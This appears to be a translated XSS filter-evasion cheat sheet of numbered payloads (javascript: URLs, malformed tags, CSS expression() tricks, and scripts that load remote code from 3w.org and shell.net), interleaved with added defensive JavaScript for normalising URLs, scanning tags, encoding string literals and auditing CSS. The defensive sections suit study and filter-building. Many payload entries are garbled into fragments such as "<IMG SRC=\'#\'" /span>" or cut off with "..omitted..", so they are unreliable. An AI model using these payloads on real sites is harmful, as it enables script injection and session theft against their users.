(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert pop-ups
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using JavaScript commands
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolons and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hexadecimal encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Getting around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null bytes are basically ineffective in China, because there is nowhere they can be used)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'" javascript:alert('XSS');">
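
Entries (3) through (19) are all the same `javascript:` URL written so that a filter comparing raw text against the string "javascript:" does not see it (mixed case, decimal and hex entities with and without semicolons, an embedded tab, newline or null byte, leading spaces). The defensive answer is to normalise the value the way the browser will and only then look at the scheme. The following is an added example, not code from the cheat sheet; the function names are its own, the named-entity table is deliberately small, and the samples are constructed in the style of the entries above. The attribute table at the end anticipates entries (31) to (47) further down, which show that `src` and `href` are far from the only URL-bearing attributes.

```javascript
// Added example (not part of the original cheat sheet): normalise an attribute
// value the way a browser will before deciding whether it carries a script URL.
// Function names are this example's own.

// Named entities that appear in URL-obfuscation payloads; browsers know many more.
const NAMED_ENTITIES = { tab: '\t', newline: '\n', colon: ':', amp: '&', lt: '<', gt: '>', quot: '"' };

// Decode decimal (&#106;), hex (&#x6A;) and named entities. The semicolon is
// optional because browsers also accept "&#106" when a non-digit follows.
function decodeEntities(text) {
  return text.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === '#') {
      const hex = body[1].toLowerCase() === 'x';
      const cp = parseInt(body.slice(hex ? 2 : 1), hex ? 16 : 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    const named = NAMED_ENTITIES[body.toLowerCase()];
    return named === undefined ? match : named;
  });
}

// Browsers ignore tab, newline and carriage return inside a URL and strip
// leading/trailing controls; a null byte split the token in some old parsers.
// A filter can safely drop every C0 control and space before comparing.
function normaliseUrl(raw) {
  return decodeEntities(raw).replace(/[\u0000-\u0020]+/g, '').toLowerCase();
}

// Schemes that appear on this page; both run script when used as a URL.
const SCRIPT_SCHEMES = ['javascript:', 'vbscript:'];

function isDangerousUrl(raw) {
  const url = normaliseUrl(raw);
  return SCRIPT_SCHEMES.some((scheme) => url.startsWith(scheme));
}

// Entry (41): <META HTTP-EQUIV=refresh CONTENT="0; URL=...">. Every "URL="
// fragment is checked, because that payload chains a harmless one in front.
function isDangerousMetaRefresh(content) {
  return content.split(/url\s*=/i).slice(1).some(isDangerousUrl);
}

// Element/attribute pairs from entries (1)-(55) that take a URL.
const URL_ATTRIBUTES = {
  a: ['href'], base: ['href'], link: ['href'],
  img: ['src', 'dynsrc', 'lowsrc'], input: ['src'], script: ['src'],
  iframe: ['src'], frame: ['src'], embed: ['src'], bgsound: ['src'],
  body: ['background'], table: ['background'], td: ['background'],
};

function isDangerousAttribute(tag, name, value) {
  const t = tag.toLowerCase();
  const n = name.toLowerCase();
  if (t === 'meta' && n === 'content') return isDangerousMetaRefresh(value);
  return (URL_ATTRIBUTES[t] || []).includes(n) && isDangerousUrl(value);
}

// Constructed samples in the style of entries (4), (5), (9), (12) and (17).
const SAMPLES = [
  "JaVaScRiPt:alert('XSS')",
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
  "&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58alert('XSS')",
  "jav&#x09;ascript:alert('XSS')",
  'java\0script:alert(1)',
  'https://example.com/xss.js',
];
for (const s of SAMPLES) console.log(isDangerousUrl(s), JSON.stringify(s));
```

The order of operations is the point: decode entities first, then strip controls, then lower-case, then compare the prefix. Doing the comparison before decoding, or decoding only entities that end in a semicolon, reproduces exactly the gaps entries (5), (9) and (10) describe.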
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double opening brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double opening angle brackets
<iframe src=http://3w.org/XSS.html <
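
Entries (1), (99) and (20) to (27) share one idea: a filter that expects well-formed markup (a space before each attribute, a closing `</SCRIPT>`, a `>` on every tag, a known tag name) while the browser's tokenizer happily accepts `/` as an attribute separator, unknown tag names and tags that are never closed. The following is an added example, not code from the cheat sheet: a small start-tag scanner that follows the HTML tokenizer's tag-name and attribute-name rules, placed next to the kind of regular expression many filters use. Function names are this example's own; the samples are the page's own vectors plus one benign tag.

```javascript
// Added example (not part of the original cheat sheet): tokenizer-style scan
// versus a regex filter. Function names are this example's own.

// Regex-style filter: needs a well-formed <script ...>...</script> pair or a
// whitespace-separated on* attribute, which is exactly what the vectors avoid.
const NAIVE_PATTERN = /<script(\s[^>]*)?>[\s\S]*?<\/script>|\son[a-z]+\s*=/i;

function naiveFilterCatches(html) {
  return NAIVE_PATTERN.test(html);
}

// Mirrors the HTML spec's tag-open, tag-name and attribute-name states: a tag
// starts at "<" + letter, a tag name ends at whitespace, "/" or ">", and an
// attribute name ends at whitespace, "/", ">" or "=". No ">" is needed to
// finish a tag, so unclosed tags (entries 24-27) are still recorded.
function scanStartTags(html) {
  const tags = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== '<' || !/[a-z]/i.test(html[i + 1] || '')) { i += 1; continue; }
    i += 1;
    let name = '';
    while (i < html.length && !/[\s\/>]/.test(html[i])) name += html[i++];
    const attrs = [];
    while (i < html.length && html[i] !== '>') {
      if (/[\s\/]/.test(html[i])) { i += 1; continue; }   // "/" separates like a space
      let attrName = '';
      while (i < html.length && !/[\s\/>=]/.test(html[i])) attrName += html[i++];
      let value = '';
      if (html[i] === '=') {
        i += 1;
        while (i < html.length && /\s/.test(html[i])) i += 1;
        const quote = html[i];
        if (quote === '"' || quote === "'") {
          i += 1;
          while (i < html.length && html[i] !== quote) value += html[i++];
          i += 1; // closing quote
        } else {
          while (i < html.length && !/[\s>]/.test(html[i])) value += html[i++];
        }
      }
      if (attrName) attrs.push({ name: attrName.toLowerCase(), value });
    }
    i += 1; // past ">" (or past end of input)
    tags.push({ name: name.toLowerCase(), attrs });
  }
  return tags;
}

// Report what a browser would act on: any script start tag, and any on*
// attribute on any element name, including unknown ones such as <zzz>.
function findDangerousTags(html) {
  const findings = [];
  for (const tag of scanStartTags(html)) {
    if (tag.name === 'script') findings.push({ tag: tag.name, reason: 'script tag' });
    for (const attr of tag.attrs) {
      if (attr.name.startsWith('on')) findings.push({ tag: tag.name, reason: `event handler ${attr.name}` });
    }
  }
  return findings;
}

// Vectors from entries (99), (20), (25) and (8) of this page, plus a benign tag.
const SAMPLES = [
  '<q/oncut=alert()>1',
  '<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>',
  '<SCRIPT SRC=//3w.org/XSS/xss.js>',
  '<a onclick=alert`1`>clickme</a>',
  '<p class="note">hello</p>',
];
for (const s of SAMPLES) {
  console.log(JSON.stringify(s), 'regex:', naiveFilterCatches(s), 'tokenizer:', findDangerousTags(s).length);
}
```

The scanner is deliberately conservative (it does not track script bodies or comments, so it over-reports rather than under-reports), which is the right bias for a detector. The practical lesson is the one the cheat sheet keeps making: parse the markup with the same rules the browser uses, or, better, do not try to blacklist at all and instead serialise untrusted input with context-appropriate output encoding.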
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/;
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
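
Entry (29) is aimed at code that places a value inside a JavaScript string literal after "escaping" it by rewriting every `"` as `\"`. If the value already ends in a backslash, the backslash the escaper inserts is itself escaped, the quote closes the literal and the remainder is parsed as code. The following is an added example, not code from the cheat sheet: the weak escaper next to a correct encoder for the same context, and a small scanner that reports where a double-quoted literal actually ends. Function names are this example's own.

```javascript
// Added example (not part of the original cheat sheet): JS string-literal
// context, weak escaper versus correct encoder. Function names are this example's own.

// The weak escaper entry (29) defeats.
function naiveJsEscape(value) {
  return value.replace(/"/g, '\\"');
}

// Correct encoding for the same context: JSON.stringify doubles backslashes and
// escapes quotes and control characters; "<" is written as \u003c so the literal
// can never contain "</script>" (the same early-close idea as entry (30)), and
// U+2028/U+2029 are escaped because they terminate a JavaScript line.
function safeJsStringLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Index of the quote that closes the double-quoted literal starting at
// source[0], or -1 if it never closes. A backslash skips the next character,
// as the JavaScript tokenizer does.
function literalEnd(source) {
  if (source[0] !== '"') return -1;
  for (let i = 1; i < source.length; i += 1) {
    if (source[i] === '\\') { i += 1; continue; }
    if (source[i] === '"') return i;
  }
  return -1;
}

// Whatever follows the closing quote would be parsed as code.
function codeAfterLiteral(source) {
  const end = literalEnd(source);
  return end === -1 ? '' : source.slice(end + 1);
}

// True when the whole of `source` is a single string literal.
function staysInsideLiteral(source) {
  return literalEnd(source) === source.length - 1;
}

// Entry (29) as a JavaScript string: backslash, quote, then the injected code.
const PAYLOAD = '\\";alert(\'XSS\');//';
const naive = '"' + naiveJsEscape(PAYLOAD) + '"';
const safe = safeJsStringLiteral(PAYLOAD);
console.log('naive  :', naive, '-> code after literal:', JSON.stringify(codeAfterLiteral(naive)));
console.log('correct:', safe, '-> code after literal:', JSON.stringify(codeAfterLiteral(safe)));
```

The general rule this illustrates: an escaper has to handle its own escape character before anything else, and the simplest way to get that right is to reuse a serialiser written for the target context (here JSON) rather than a hand-rolled replace.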
(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made of an opening angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
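
Entries (37) to (53) move the payload into CSS, whether a `<STYLE>` block, a `STYLE` attribute or a linked stylesheet: `url()` carrying a `javascript:` URL and the old IE `expression()` property, the latter split across comments or written with CSS escapes as entries (49) and (52) hint. The CSS parser removes comments and decodes backslash escapes before it sees a property value, so a filter has to do the same before it can recognise either construct. The following is an added example, not code from the cheat sheet; function names are its own, and the comment-split and escaped samples are constructed variants of entry (48).

```javascript
// Added example (not part of the original cheat sheet): normalise CSS text the
// way the CSS tokenizer does, then look for the constructs on this page.
// Function names are this example's own.

// /* ... */ comments are dropped by the CSS tokenizer, so "expr/*x*/ession"
// reads as "expression" to the browser.
function stripCssComments(css) {
  return css.replace(/\/\*[\s\S]*?\*\//g, '');
}

// CSS backslash escapes: "\65" (1-6 hex digits, one optional following
// whitespace character consumed) is "e"; "\(" is a literal "(".
function decodeCssEscapes(css) {
  return css.replace(/\\([0-9a-f]{1,6})\s?|\\([\s\S])/gi, (match, hex, ch) => {
    if (hex !== undefined) {
      const cp = parseInt(hex, 16);
      return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : '\ufffd';
    }
    return ch;
  });
}

// Comments out, escapes decoded, controls and spaces removed, lower-cased.
function normaliseCss(css) {
  return decodeCssEscapes(stripCssComments(css))
    .replace(/[\u0000-\u0020]+/g, '')
    .toLowerCase();
}

// The two constructs the page uses inside CSS. Whitespace has already been
// removed, so "url( 'javascript:" has become "url('javascript:".
const CSS_RED_FLAGS = [
  { pattern: /expression\(/, reason: 'expression()' },
  { pattern: /url\(["']?(javascript|vbscript):/, reason: 'url() with a script scheme' },
];

// Returns the reasons a style value or stylesheet should be rejected ([] if none).
function auditCss(css) {
  const normalised = normaliseCss(css);
  return CSS_RED_FLAGS.filter((f) => f.pattern.test(normalised)).map((f) => f.reason);
}

const SAMPLES = [
  "width: expression(alert('XSS'))",                    // entry (48)
  "width: expr/*XSS*/ession(alert('XSS'))",             // constructed: comment split
  "width: \\65 xpression(alert('XSS'))",                // constructed: CSS hex escape
  "background-image: url(\"javascript:alert('XSS')\")", // entry (51)
  'color: red; background: url(https://example.com/bg.png)',
];
for (const s of SAMPLES) console.log(JSON.stringify(s), '->', auditCss(s));
```

In practice most sanitisers go one step further than this detector and simply refuse `url()` and any backslash in user-supplied style values, allowing only a short list of properties; the normalisation above is what makes even that stricter rule enforceable, since without it `u\72 l(` or `ur/**/l(` slip past a literal match.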